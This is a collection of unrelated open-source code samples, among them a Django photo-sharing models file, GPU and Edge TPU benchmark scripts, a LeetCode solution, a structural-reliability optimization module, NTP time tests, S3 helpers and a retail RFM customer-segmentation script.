3394094 | <reponame>njoanc/Instagram
from django.db import models
from django.contrib.auth.models import User
import datetime as dt
from django.db.models.signals import post_save
from django.dispatch import receiver
from tinymce.models import HTMLField
class Profile(models.Model):
user = models.OneToOneField(User,on_delete=models.CASCADE, null=True)
first_name = models.CharField(max_length=30, null=True)
last_name = models.CharField(max_length=30, null=True)
bio = models.CharField(max_length=350, null=True)
profile_pic = models.ImageField(upload_to='ProfilePicture/', null=True)
# profile_avatar = models.ImageField(upload_to='AvatorPicture/', null=True)
date = models.DateTimeField(auto_now_add=True, null= True)
birth_date = models.DateField(null=True)
email = models.EmailField(max_length=150, null=True)
password = models.CharField(max_length=150, null=True)
@receiver(post_save, sender=User)
def update_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
instance.profile.save()
def save_profile(self):
self.save()
@classmethod
def get_by_id(cls, id):
details = Profile.objects.get(user = id)
return details
@classmethod
def filter_by_id(cls, id):
details = Profile.objects.filter(user = id).first()
return details
@classmethod
def search_user(cls, name):
userprof = User.objects.filter(username__icontains = name)
return userprof
class Comments (models.Model):
comment_post = models.CharField(max_length=150, null=True)
author = models.ForeignKey('Profile',related_name='comment' , on_delete=models.CASCADE)
commented_image = models.ForeignKey('Image', on_delete=models.CASCADE)
date = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return self.comment_post
class Meta:
ordering = ['comment_post', 'author','commented_image']
def save_comment(self):
self.save()
def delete_comment(self):
self.delete()
@classmethod
def find_commentimage(cls,id):
comments = Comments.objects.filter(image__pk = id)
return comments
class Image(models.Model):
image = models.ImageField(upload_to ='pictsagram/',null=True)
image_caption = models.CharField(max_length=700, null=True)
tag_someone = models.CharField(max_length=50,blank=True, null=True)
profile = models.ForeignKey(Profile, null = True,on_delete=models.CASCADE,related_name='image')
image.user = models.ForeignKey(User, on_delete=models.CASCADE, blank=True, null=True)
image_likes = models.ManyToManyField('Profile', default=False, blank=True,related_name='likes')
date = models.DateTimeField(auto_now_add=True, null= True)
# comment = models.ForeignKey
user= models.ForeignKey(User, null=True, blank=True, on_delete=models.CASCADE)
def save_image(self):
self.save()
@classmethod
def get_by_id(cls,id):
image= Image.objects.get(user = id)
return image
@classmethod
def get_images(cls, profile):
        image = Image.objects.filter(profile__pk = profile)
return image
@classmethod
def get_all_images(cls):
images = Image.objects.all()
return images
@classmethod
def get_profile_images(cls, profile):
images = Image.objects.filter(profile__pk = profile)
return images
@classmethod
def find_image_id(cls, id):
identity = Image.objects.get(pk=id)
return identity
class Follow(models.Model):
user = models.ForeignKey(Profile,on_delete=models.CASCADE,null=True)
follower = models.ForeignKey(User,on_delete=models.CASCADE,null=True)
def __int__(self):
return self.name
def save_follower(self):
self.save()
    def delete_follower(self):
        self.delete()
class Unfollow(models.Model):
user = models.ForeignKey(Profile,on_delete=models.CASCADE,null=True)
follower = models.ForeignKey(User,on_delete=models.CASCADE,null=True)
def __int__(self):
return self.name
def save_unfollower(self):
self.save()
def delete_unfollower(self):
self.save()
| StarcoderdataPython |
168036 | <reponame>jaredhoberock/cuda_graphs_executor_prototypes
#!/usr/bin/env python3
import sys
import os
import subprocess
import numpy
endpoints = numpy.logspace(3, 8.66, 10)
sizes = []
start = 1
for end in endpoints:
points = numpy.linspace(start, end, 10, endpoint = False)
sizes.extend([int(pt) for pt in points])
start = end
sizes.append(int(start))
program_name = os.path.abspath(sys.argv[1])
print("size,bandwidth")
for size in sizes:
output = subprocess.run([program_name, str(size)], stdout = subprocess.PIPE, stderr = subprocess.PIPE).stderr
print(output.decode(), end = '')
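
# Example invocation (program path is a placeholder): the benchmarked binary is
# expected to print one measurement per problem size on stderr.
#   ./benchmark.py ./saxpy > bandwidth.csv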
| StarcoderdataPython |
3245312 | import math
import string


class Solution:
def minimumDistance(self, word: str) -> int:
keyboard = [None] * 256
ncols = 6
word = [ord(ch) for ch in word]
for ch in string.ascii_uppercase:
idx = ord(ch) - ord('A')
r, c = idx // ncols, idx % ncols
keyboard[ord(ch)] = (r, c)
def dist(ch1, ch2):
r1, c1 = keyboard[ch1]
r2, c2 = keyboard[ch2]
return abs(r1 - r2) + abs(c1 - c2)
memo = {}
def dfs(cur, f1, f2):
if cur == len(word):
return 0
if (cur, f1, f2) in memo:
return memo[cur, f1, f2]
else:
ch = word[cur]
ans = min(dist(ch, f1) + dfs(cur + 1, ch, f2), dist(ch, f2) + dfs(cur + 1, f1, ch))
memo[cur, f1, f2] = ans
return ans
mn = math.inf
for c1 in string.ascii_uppercase:
for c2 in string.ascii_uppercase:
f1, f2 = ord(c1), ord(c2)
mn = min(mn, dfs(0, f1, f2))
return mn
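
# Quick illustration (not part of the original submission): for LeetCode 1320 the
# expected result is
#   Solution().minimumDistance("CAKE")  # -> 3, e.g. one finger types "CA", the other "KE"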
| StarcoderdataPython |
3333956 | #######################################################
#
# Teams.py
# Python implementation of the Enumeration Teams
# Generated by Enterprise Architect
# Created on: 04-Nov-2020 4:43:17 PM
# Original author: natha
#
#######################################################
class Teams:
# default constructor def __init__(self):
Yellow = ""
Red = ""
Green = ""
Blue = ""
| StarcoderdataPython |
53596 | import re
from arqtty_scrapper.page_types import Page_types
class Classifier:
def __init__(self, page_str):
self.page = page_str
def _is_404(self):
        marker1 = 'Ой, ой, страничка потерялась'  # "Oops, the page got lost"
        marker2 = 'Спокойно! Логи записаны. Все будет исправлено.'  # "Stay calm! The logs are recorded. Everything will be fixed."
return re.search(marker1, self.page) and re.search(marker2, self.page)
def _is_user_blocked(self):
marker1 = "Пользователь '[\w\W]*' заблокирован"
return re.search(marker1, self.page)
def _is_alive(self):
        marker1 = 'Лента действий'  # "Activity feed"
return re.search(marker1, self.page)
def get_type(self):
if self._is_404():
return Page_types.E_404
elif self._is_user_blocked():
return Page_types.USER_BANNED
elif self._is_alive():
return Page_types.CORRECT
else:
return Page_types.UNDEFINED
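
# Usage sketch (assumes callers pass the raw HTML of a scraped profile page):
#   page_html = "... Лента действий ..."      # contains the "activity feed" marker
#   Classifier(page_html).get_type()          # -> Page_types.CORRECT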
| StarcoderdataPython |
1688374 | <filename>edge_tpu/video_object_detection.py<gh_stars>0
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""A demo for object detection.
For Raspberry Pi, you need to install 'feh' as image viewer:
sudo apt-get install feh
Example (Running under edgetpu repo's root directory):
- Face detection:
python3 examples/object_detection.py \
--model='test_data/mobilenet_ssd_v2_face_quant_postprocess_edgetpu.tflite' \
--keep_aspect_ratio
- Pet detection:
python3 examples/object_detection.py \
--model='test_data/ssd_mobilenet_v1_fine_tuned_edgetpu.tflite' \
--label='test_data/pet_labels.txt' \
--keep_aspect_ratio
"""
import argparse
import platform
import subprocess
from edgetpu.detection.engine import DetectionEngine
from edgetpu.utils import dataset_utils
from PIL import Image
from PIL import ImageDraw
import glob
import time
import cv2
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'--model',
help='Path of the detection model, it must be a SSD model with postprocessing operator.',
required=True)
parser.add_argument('--label', help='Path of the labels file.')
parser.add_argument(
'--keep_aspect_ratio',
dest='keep_aspect_ratio',
action='store_true',
help=(
'keep the image aspect ratio when down-sampling the image by adding '
'black pixel padding (zeros) on bottom or right. '
'By default the image is resized and reshaped without cropping. This '
'option should be the same as what is applied on input images during '
'model training. Otherwise the accuracy may be affected and the '
'bounding box of detection result may be stretched.'))
parser.set_defaults(keep_aspect_ratio=False)
args = parser.parse_args()
# Initialize engine.
engine = DetectionEngine(args.model)
labels = dataset_utils.read_label_file(args.label) if args.label else None
cap = cv2.VideoCapture('fast_forward.mp4')
total_time = 0
load_time = 0
preproc_time = 0
infer_time = 0
postproc_time = 0
image_count = 0
for i in range(10):
while image_count < 10000:
# Open image.
start_time = time.time()
            ret, img = cap.read()
            load_time += time.time() - start_time
            if not ret:
                # the video ran out of frames before reaching the target count
                break
temp_time = time.time()
img = Image.fromarray(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
im_width, im_height = img.size
img_resized = img.resize((300,300))
preproc_time += time.time() - temp_time
# Run inference.
temp_time = time.time()
ans = engine.detect_with_image(
img_resized,
threshold=0.5,
keep_aspect_ratio=args.keep_aspect_ratio,
relative_coord=False,
top_k=15)
infer_time += time.time() - temp_time
temp_time = time.time()
draw = ImageDraw.Draw(img)
# Display result.
if ans:
for obj in ans:
box = obj.bounding_box.flatten().tolist()
# Draw a rectangle.
draw.rectangle([box[0]* im_width / 300, box[1]* im_height /300, box[2]* im_width /300, box[3] * im_height / 300], outline='red')
#img.save('output/' + file_name[file_name.rfind('/'):])
postproc_time += time.time() - temp_time
total_time += time.time() - start_time
image_count += 1
if image_count % 50 == 0:
print('num of inferred images: ', image_count)
print('total images used for benchmark: ' + str(image_count))
print('total time (s): ' + str(total_time))
print('total load time (s): ' + str(load_time))
print('total preprocess time (s): ' + str(preproc_time))
print('total inference time (s): ' + str(infer_time) )
print('total postrocess time (s): ' + str(postproc_time))
print('average total time (s): ' + str(total_time / image_count))
print('average load time (s): ' + str(load_time / image_count))
print('average preprocess time (s): ' + str(preproc_time / image_count))
print('average inference time (s): ' + str(infer_time / image_count))
print('average postrocess time (s): ' + str(postproc_time / image_count))
if __name__ == '__main__':
main()
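
# Example invocation (model and label paths are placeholders, not from this repo):
#   python3 video_object_detection.py \
#       --model mobilenet_ssd_v2_coco_quant_postprocess_edgetpu.tflite \
#       --label coco_labels.txt --keep_aspect_ratio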
| StarcoderdataPython |
15437 | # -*- coding: utf-8 -*-
"""
Created on Fri Aug 9 15:33:47 2019
@author: Bogoclu
"""
import typing
import multiprocessing as mp
import warnings
import numpy as np
from scipy import stats
from .space import FullSpace
from duqo.proba import DS, MC, SUSE, ISPUD, FORM
from duqo.doe.lhs import make_doe
def _check_obj_wgt(obj_weights, num_obj):
""" Check obj_wgt argument passed to CondMom """
if obj_weights is None:
return None
try:
_ = obj_weights[0]
except (TypeError, IndexError):
obj_weights = np.ones(num_obj) * obj_weights
if len(obj_weights) != num_obj:
msg = f"Mismatch between the number of entries ({len(obj_weights)} in "
msg += f"obj_wgt and the number of stochastic objectives ({num_obj})."
raise ValueError(msg)
return np.array(obj_weights).ravel()
def _check_std_inds(use_std, num_obj):
""" Check use_std argument passed to CondMom and
convert it to a slice definition
"""
if isinstance(use_std, bool):
inds = [use_std] * num_obj
if len(inds) != num_obj:
msg = "Mismatch between the number of entries in "
msg += "use_std and the number of stochastic objectives."
raise ValueError(msg)
return np.array(use_std, dtype=bool)
def _find_integrator_cls(integrator):
"""
Find the Integrator class as defined by the string integrator
"""
integrator = integrator.upper()
if integrator == "DS":
IntCls = DS
elif integrator == "MC":
IntCls = MC
elif integrator == "ISPUD":
IntCls = ISPUD
elif integrator == "FORM":
IntCls = FORM
elif integrator == "SUSE":
IntCls = SUSE
else:
msg = f"Requested integrator {integrator} is not found."
raise ValueError(msg)
return IntCls
def _make_chain(methods: list):
"""Makes the chain given a list of method names"""
try:
first = methods[0]
except TypeError:
raise TypeError(f"methods must be a list of strings or classes, not {type(methods)}")
try:
_ = first.upper()
except AttributeError:
return methods
return [_find_integrator_cls(name.upper()) for name in methods]
def _n_para_chk(num_parallel: int = None):
""" Check the num_parallel argument as passed to CondProb """
n_procs = max(1, mp.cpu_count()) # could cpu_count ever be < 1?
if num_parallel is None or num_parallel > n_procs:
print(f"Number of parallel processes was set to {n_procs}")
return n_procs
return num_parallel
def _default_init(targ_prob: float, acc_max: float, num_inp: int,
num_para: int):
"""Decide the default integrator chain methods and arguments depending
on the problem
Parameters
----------
targ_prob : float
target failure probability
acc_max : float
target tolerance for the estimation
num_inp : int
number of stochastic inputs of the constraints
num_para : int
number of parallel processes to use
Returns
-------
integrators : list
Integrator classes, that are to be initiated
int_args : dict
Keyword arguments to pass to integrators
"""
if targ_prob * acc_max >= 1e-5:
if targ_prob * acc_max >= 1e-4:
integrators = ["MC"]
else:
integrators = ["SUSE", "MC"]
int_args = {"num_starts": 1, "batch_size": 1e5}
elif num_inp < 15:
integrators = ["SUSE", "DS"]
int_args = {"num_starts": 1}
else:
integrators = ["SUSE"]
int_args = {"num_starts": num_para}
print("Using", integrators, "as default chain.")
return integrators, int_args
def _is_worker(workers, name):
""" check if name is in workers list of classes"""
for worker in workers:
wname = read_integrator_name(worker)
if name.upper() in wname.upper():
return True
return False
def read_integrator_name(worker):
""" read the name of the integrator instance worker """
name = str(worker).split(".")[-1]
return "".join([c for c in name if c.isalnum()])
class CondMom:
"""Class to estimate conditional means
full_space : FullSpace instance
The definition of the optimization and stochastic spaces
base_doe : int or np.ndarray
set if a new doe should be calculated or the same one should
be transformed during the optimization.
if array, it should have zero mean and unit variance
but the original marginal distributions and correlation.
it should have same number of columns as stochastic variables
used in the objective. If integer, a base_doe with that number of
samples will be created
doe_size : int
The size of the doe to use. If base_doe is a numpy array, this
has no effect and doesn't have to be passed.
obj_wgt : float or iterable of floats:
If not None, these weights will be used for combining the
estimated mean and the variance/std. dev. If iterable, it
must be the same length as the number of stochastic input
variables as used for the objective function.
If None, the variances are returned separetly
use_std : bool or iterable of bools
Flag to use standard deviation (True) or the variance for the
estimation. If iterable, it must be the same length as the number
of stochastic input variables as used for the objective function.
"""
def __init__(self, full_space: FullSpace, base_doe: typing.Union[bool, np.ndarray] = True,
doe_size: int = 100, obj_wgt: typing.Optional[typing.Union[float, list, np.ndarray]] = None,
use_std: typing.Union[bool, list] = False):
self.full_space = full_space
num_obj = len(self.full_space.obj_inds["sto"])
self._use_std = _check_std_inds(use_std, num_obj)
self._obj_wgt = _check_obj_wgt(obj_wgt, num_obj)
self._doe_size = None
self._base_doe = None
self.doe_size = doe_size
self.base_doe = base_doe
@property
def base_doe(self):
"""Base doe to use for the moment estimation
Don't set this to an array with truncnorm and lognormal distributions
in the MultiVariate if you don't know exactly what you are doing.
"""
return self._base_doe
@base_doe.setter
def base_doe(self, new_doe):
"""Base doe to use for the moment estimation
Don't set this to an array with truncnorm and lognormal distributions
in the MultiVariate if you don't know exactly what you are doing.
"""
# Sanity checks for base_doe. Using parameters with multiple valid types
# may be an antipattern but it makes configuration easier from
# the user point of view. Tolerate this for a better user experience.
if isinstance(new_doe, np.ndarray):
if self._is_valid_base(new_doe): # raises errors
self._base_doe = new_doe.copy() # Make our copy.
return
try:
make_base_doe = bool(new_doe)
except ValueError:
return
if make_base_doe:
# Prepare doe with zero mean and unit variance
doe = self.full_space.inp_space.sto_obj_base_doe(self.doe_size)
self._base_doe = doe
return
# if not bool(new_doe); remake new doe so set base_doe to None
self._base_doe = None
return
def _is_valid_base(self, new_doe):
# Assume numpy array
n_sto_obj_inps = len(self.full_space.inp_space.inds["sto_obj"])
if new_doe.shape[1] != n_sto_obj_inps:
msg = "base_doe must be one of None, bool or a 2d array "
msg += f"with shape (num_samples, num_stochastic_objective_variables={n_sto_obj_inps})."
raise TypeError(msg)
if max(abs(new_doe.mean(0).max()), abs(1 - new_doe.std(0).max())) > 0.5:
msg = "base_doe must have zero mean and unit variance."
raise ValueError(msg)
return True
@property
def doe_size(self):
"""Size of the base doe to use for the moment estimation"""
return self._doe_size
@doe_size.setter
def doe_size(self, new_size):
"""Size of the base doe to use for the moment estimation"""
self._doe_size = new_size
if self.base_doe is not None:
self.base_doe = new_size
@property
def obj_wgt(self):
"""Weights for the linear combination of cond. moments"""
return self._obj_wgt
@obj_wgt.setter
def obj_wgt(self, new_obj_wgt):
"""Weights for the linear combination of cond. moments"""
n_obj = len(self.full_space.obj_inds["sto"])
self._obj_wgt = _check_obj_wgt(new_obj_wgt, n_obj)
@property
def use_std(self):
"""Indexes to use std. dev. instead of variance"""
return self._use_std
@use_std.setter
def use_std(self, new_std):
"""Indexes to use std. dev. instead of variance"""
n_obj = len(self.full_space.obj_inds["sto"])
self._use_std = _check_std_inds(new_std, n_obj)
def gen_doe(self, x_opt):
"""Get DoE for the Moment estimation for x_opt"""
if x_opt.ndim == 1:
x_opt = x_opt.reshape((1, -1))
if self.base_doe is None:
return self.full_space.inp_space.sto_obj_doe(x_opt, self._doe_size)
mean, std = self.full_space.inp_space.opt_moms(x_opt)
names = self.full_space.inp_space.mulvar.names
names = [names[i] for i in self.full_space.inp_space.mv_inds("sto_obj")]
# Translating is not sufficient for lognormal and truncated normal
inds = [i for i, x in enumerate(names) if "log" in x or "trunc" in x]
if not inds:
return self.base_doe * std + mean
# Handle Lognormal
binds = np.ones(self.base_doe.shape[1], dtype=bool)
binds[inds] = False
base_doe = self.base_doe.copy()
base_doe[:, binds] = base_doe[:, binds] * std[binds] + mean[binds]
mean = mean[inds]
std = std[inds]
cur_mv = self.full_space.inp_space.opt_mulvar(x_opt, domain="sto_obj")
for ind in inds:
base_doe[:, ind] = cur_mv.dists[ind].marg.ppf(base_doe[:, ind])
return base_doe
def est_mom(self, x_opt):
""" Estimate conditional moments for a single optimization point x_opt
Conditional moments are E[Y | x_opt] and Var[Y | x_opt]
Parameters
----------
x_opt : numpy.ndarray
the coordinates of the optimization variables to compute
the moments
Returns
-------
mus : numpy.ndarray
Estimated means, or if obj_wgt was not None,
the combined mu + obj_wgt * sigma
sigmas : numpy.ndarray
Estimated variances or std. dev. depending on the settings.
only returned if obj_wgt is None.
"""
if x_opt.ndim == 1:
x_opt = x_opt.reshape((1, -1))
doe = self.gen_doe(x_opt)
res = self.full_space.sto_obj(doe, x_opt)
mus = np.mean(res, axis=0)
sigmas = np.zeros(mus.shape)
std_inds = self.use_std
sigmas[std_inds] = np.std(res[:, std_inds], axis=0, ddof=1)
var_inds = np.logical_not(std_inds)
sigmas[var_inds] = np.var(res[:, var_inds], axis=0, ddof=1)
if self.obj_wgt is None:
return mus, sigmas
return mus + self.obj_wgt * sigmas
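
# Sketch of the intended CondMom call pattern (the FullSpace construction is assumed,
# since that class is defined elsewhere in duqo):
#   mom = CondMom(full_space, base_doe=True, doe_size=128, obj_wgt=1.0)
#   combined = mom.est_mom(x_opt)   # mu + obj_wgt * sigma because obj_wgt is not None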
class CondProba:
"""A chain of integtrators for the calculation of the probability
This starts with a fast integrator to get an initial guess. If the
guess is too far away from target_pf, this stops further calculations
and returns the failure probability. Used for accelerating the
optimization process. Chains with a single element are also possible.
Parameters
----------
num_inputs : int
Number of stochastic inputs used for the constraints
target_fail_prob : float
Target failure probability. If unsure, just set it sufficiently low
i.e. >=1e-6. Note that Numerical unstabilities start at 1e-9 due to
scipy stats returning nans and infs
num_parallel : int
Number of parallel computations, if the used integrator supports it.
If passed, the entry in call_args will override this.
methods : None or list of str
Names of the methods to use for the estimation. If None, a default
chain will be selected depending the problem definition, which is
recommended for new users.
Currently the following names are supported:
MC - Crude Monte Carlo
DS - Directional simulation
FORM - First order reliability method
ISPUD - Importance sampling using design point (MPP)
call_args : None or list
keyword argument dict to pass to the integrator calc_prob_fail
as call arguments. Any argument in this will override the
initialization arguments with the same name i.e. target_fp and
num_parallel
target_tol : float
Target tolerance for the failure probability. Also used
for stopping the chain, if the computed failure probability
is either smaller than target_fp * target_tol or larger than
target_fp / target_tol.
"""
def __init__(self, target_fail_prob: float, num_inputs: int, num_parallel: int = 4,
methods: typing.Optional[typing.Union[str, list]] = None, call_args: typing.Optional[dict] = None,
target_tol: float = 0.01):
self.n_inp = num_inputs
num_para = _n_para_chk(num_parallel)
cargs = {"num_parallel": num_para, "multi_region": True}
if methods is None:
methods, cargs = _default_init(target_fail_prob, target_tol,
num_inputs, num_para)
if call_args is None:
self.call_args = {**cargs}
else:
self.call_args = {**cargs, **call_args}
self._tar_fp = target_fail_prob
self._tar_tol = target_tol
self.workers = _make_chain(methods)
self._prob_tol()
if "doe" in self.call_args.keys():
doe = self.call_args["doe"]
if doe.shape[1] != self.n_inp:
msg = f"Shape mismatch between the number of inputs ({self.n_inp}) "
msg += f"and the DoE {doe.shape[1]}"
raise ValueError()
mu_max = np.max(np.mean(doe, axis=0))
sig_max = np.max(np.std(doe, axis=0))
if abs(mu_max) > 1e-10 or abs(sig_max - 1) > 1e-10:
msg = "Zero mean and unit variance is required for doe "
msg += "in call_args, found mean == {mu_max} and "
msg += "sigma == {sig_max} columns"
raise ValueError(msg)
elif _is_worker(self.workers, "ISPUD"):
margs = [stats.norm() for k in range(self.n_inp)]
self.call_args["doe"] = make_doe(100, margs, num_tries=1000)
self.call_args["post_proc"] = False
self.call_args["num_parallel"] = num_para
@property
def target_fail_prob(self):
"""target failure probability"""
return self._tar_fp
@target_fail_prob.setter
def target_fail_prob(self, new_fp):
"""target failure probability"""
if new_fp <= 0 or new_fp > 0.9:
msg = "Target failure probability should lie in the interval (0,0.9]"
raise ValueError(msg)
self._tar_fp = new_fp
self._prob_tol()
@property
def target_tol(self):
"""Target accuracy for failure probability estimation"""
return self._tar_tol
@target_tol.setter
def target_tol(self, new_tol):
"""Target accuracy for failure probability estimation"""
if new_tol <= 0 or new_tol > 0.9:
msg = "Target probability accuracy should lie in the interval (0,0.9]"
raise ValueError(msg)
self._tar_tol = new_tol
self._prob_tol()
def _prob_tol(self):
prob_tol = self._tar_fp * self._tar_tol
if _is_worker(self.workers, "MC") and prob_tol < 1e-6:
msg = "Crude Monte Carlo can be very inefficient for "
msg += "such low probabilities of failure."
warnings.warn(msg)
self.call_args["prob_tol"] = prob_tol
def calc_fail_prob(self, input_mv, constraints, const_args, verbose: int = 0):
""" Calculate failure probability using the worker chain
Parameters
----------
input_mv : MultiVar instance
Definition of the multivariate input
constraints : list
constraint functions to initialize the integrator
const_args : None or list
arguments to pass to the constraints
Returns:
--------
pof : float
probability of failure
feasible : bool
pof <= target_pf
"""
if not self.workers:
raise ValueError("No estimators defined")
for worker in self.workers:
estimator = worker(input_mv, constraints, const_args)
try:
pof = estimator.calc_fail_prob(**self.call_args)[0]
except ValueError:
if worker == self.workers[-1]:
print("Fatal error while calculating probability of failure with", worker)
print(input_mv)
print("Setting it to 100%.")
pof = 1.
continue
if verbose > 1:
name = read_integrator_name(worker)
print(f"{name} estimated the failure probability as {pof:.2e}.")
if pof > self._tar_fp:
prob_ratio = self._tar_fp / pof
else:
prob_ratio = pof / self._tar_fp
if prob_ratio <= self._tar_tol:
break
if verbose > 0:
try:
name = read_integrator_name(worker)
print(f"{name} estimated the failure probability as {pof:.2e}.")
except NameError:
pass
return pof, pof <= self._tar_fp
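
# Hedged end-to-end sketch (not from the original package): the MultiVar input below
# is schematic because its constructor lives elsewhere in duqo; only the CondProba
# call pattern is taken from this module.
#
#   def g(x):                       # limit state: failure wherever g(x) < 0
#       return 3.0 - x[:, 0] - x[:, 1]
#
#   prob = CondProba(target_fail_prob=1e-3, num_inputs=2, num_parallel=2)
#   pof, feasible = prob.calc_fail_prob(input_mv, [g], None, verbose=1)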
| StarcoderdataPython |
3260103 | <gh_stars>0
from django.utils.functional import cached_property
from waldur_core.structure.tests.fixtures import ProjectFixture
from . import factories
class AWSFixture(ProjectFixture):
@cached_property
def service(self):
return factories.AWSServiceFactory(customer=self.customer)
@cached_property
def spl(self):
return factories.AWSServiceProjectLinkFactory(service=self.service, project=self.project)
@cached_property
def region(self):
return factories.RegionFactory()
@cached_property
def image(self):
return factories.ImageFactory(region=self.region)
@cached_property
def size(self):
size = factories.SizeFactory()
size.regions.add(self.region)
return size
@cached_property
def instance(self):
return factories.InstanceFactory(service_project_link=self.spl, region=self.region)
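
# Usage sketch (assumes the surrounding Waldur test conventions): the cached
# properties build the object graph lazily, e.g.
#   fixture = AWSFixture()
#   vm = fixture.instance   # implicitly creates customer, service, project link, region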
| StarcoderdataPython |
3276276 | <reponame>altazur/PythonAutomationExamples
import pytest
def test_soap_calc_add(get_calculator, soap_version):
assert get_calculator.add(1,5, soap_version) == str(6)
| StarcoderdataPython |
1768980 | import logging
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
def is_s3_url(url):
"""
Check if url is an s3, s3n, or s3a url
"""
try:
return urlparse(url).scheme in ["s3", "s3n", "s3a"]
except ValueError:
return False
def create_s3_bucket_if_not_exists(bucket_name, region):
import boto3
from botocore.exceptions import ClientError
s3_client = boto3.client("s3", region)
try:
s3_client.get_bucket_acl(Bucket=bucket_name)
logger.debug("Found bucket %s in region %s already exist", bucket_name, region)
except ClientError as error:
if error.response and error.response["Error"]["Code"] == "NoSuchBucket":
logger.debug("Creating s3 bucket: %s in region %s", bucket_name, region)
# NOTE: boto3 will raise ClientError(InvalidLocationConstraint) if
# `LocationConstraint` is set to `us-east-1` region.
# https://github.com/boto/boto3/issues/125.
# This issue still show up in boto3 1.13.4(May 6th 2020)
try:
s3_client.create_bucket(
Bucket=bucket_name,
CreateBucketConfiguration={"LocationConstraint": region},
)
except ClientError as s3_error:
if (
s3_error.response
and s3_error.response["Error"]["Code"]
== "InvalidLocationConstraint"
):
logger.debug(
"Special s3 region: %s, will attempt create bucket without "
"`LocationConstraint`",
region,
)
s3_client.create_bucket(Bucket=bucket_name)
else:
raise s3_error
else:
raise error
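
# Example (bucket name and region are placeholders):
#   if is_s3_url("s3://my-artifacts/model"):
#       create_s3_bucket_if_not_exists("my-artifacts", "eu-west-1")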
| StarcoderdataPython |
1767752 | <reponame>scionrep/scioncc_new
__author__ = '<NAME> <<EMAIL>>'
from nose.plugins.attrib import attr
import time
import datetime
try:
import numpy as np
except ImportError:
np = None
from pyon.util.unit_test import PyonTestCase
from ion.util.ntp_time import NTP4Time
@attr('UNIT')
class NTP4TimeUnitTest(PyonTestCase):
def test_time_ntp_fidelity(self):
it1 = NTP4Time()
ntp_ts = it1.to_ntp64()
it2 = NTP4Time.from_ntp64(ntp_ts)
self.assertEquals(it1.seconds,it2.seconds)
self.assertTrue(np.abs(it1.useconds - it2.useconds) <= 1)
def test_time_string_fidelity(self):
it1 = NTP4Time()
ntp_str = it1.to_string()
it2 = NTP4Time.from_string(ntp_str)
self.assertEquals(it1.seconds,it2.seconds)
self.assertTrue(np.abs(it1.useconds - it2.useconds) <= 1)
def test_unix_time_fidelity(self):
ts = time.time()
it1 = NTP4Time(ts)
ts_2 = it1.to_unix()
self.assertTrue(np.abs(ts - ts_2) <= 1e-3)
def test_ntp_compatability(self):
unix_day = NTP4Time(datetime.datetime(1970, 1, 1))
self.assertEquals(unix_day.era, 0)
self.assertEquals(unix_day.seconds, 2208988800)
utc_day = NTP4Time(datetime.datetime(1972, 1, 1))
self.assertEquals(utc_day.era, 0)
self.assertEquals(utc_day.seconds, 2272060800)
millen_day = NTP4Time(datetime.datetime(2000, 1, 1))
self.assertEquals(millen_day.era, 0)
self.assertEquals(millen_day.seconds, 3155673600)
ntp_era1 = NTP4Time(datetime.datetime(2036, 2, 8))
self.assertEquals(ntp_era1.era, 1)
self.assertEquals(ntp_era1.seconds, 63104)
self.assertEquals(ntp_era1.to_unix(), 2086041600.)
| StarcoderdataPython |
120421 | <filename>data/retail-rfm.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#%%: import libraries
import pandas as pd
import numpy as np
import datetime as dt
import seaborn as sns
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sqlalchemy import create_engine
import matplotlib.pyplot as plt
import json
# Though the following import is not directly being used, it is required
# for 3D projection to work
#%% create functions for calculating scores by order
def scoreRecency(x,p,d): # low recency is best and is assigned 1+
if x <= d[p][0.25]:return 1
elif x <= d[p][0.50]:return 2
elif x <= d[p][0.75]:return 3
else:return 4
def scoreFrequency(x,p,d): # high frequency is best and is assigned 1
if x <= d[p][0.25]:return 4
elif x <= d[p][0.50]:return 3
elif x <= d[p][0.75]:return 2
else:return 1
def scoreMonetary(x,p,d): # high monetary is best and is assigned 1
if x <= d[p][0.25]:return 4
elif x <= d[p][0.50]:return 3
elif x <= d[p][0.75]:return 2
else:return 1
df_raw = pd.read_excel('retail-data.xlsx')
#%% drop duplicates and group by country and customer ID
df = df_raw.copy()
df.country.nunique()
df.country.unique()
#%% drop duplicates and group by country and customer ID
cc = df[['country','customerid']].drop_duplicates()
cc.groupby(['country'])['customerid']. \
aggregate('count').reset_index(). \
sort_values('customerid', ascending=False)
#%% remove customers without customer ID
df = df[pd.notnull(df['customerid'])]
df.isnull().sum(axis=0)
#%% ensure only positive quantities and prices
df.UnitPrice.min()
df.Quantity.min()
df = df[(df['Quantity']>0)]
#%% check unique value for each column
def unique_counts(df):
for i in df.columns:
count = df[i].nunique()
print(i, ": ", count)
unique_counts(df)
#%% add column for total price
df['TotalPrice'] = df['Quantity'] * df['UnitPrice']
#%% determine first and last order date
df['InvoiceDate'].min()
df['InvoiceDate'].max()
#%% establish day after last purchase as point of calculation for recency
now = dt.datetime(2011,12,10)
df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])
#%% create RFM table
rfmTable = df.groupby('customerid').agg({
'InvoiceDate': lambda x: (now - x.max()).days, #recency
'InvoiceNo': lambda x: len(x), #frequency
'TotalPrice': lambda x: x.sum()}) #monetary
rfmTable['InvoiceDate'] = rfmTable['InvoiceDate'].astype(int)
#%% convert invoice date to integer and rename columns for RFM
rfmTable.rename(columns={
'InvoiceDate': 'recency_total',
'InvoiceNo': 'frequency_total',
'TotalPrice': 'monetary_total'}, inplace=True)
#%% shift rfmTable data to quantiles for segmentation
quantiles = rfmTable.quantile(q=[0.25,0.5,0.75])
quantiles = quantiles.to_dict()
quantiles
#%% create a segmented RFM table
rfmSegment = rfmTable.copy()
#%% create new columns for RFM and assign values based on quantile
rfmSegment['r_qt'] = rfmSegment['recency_total'].apply(scoreRecency, args=('recency_total',quantiles,))
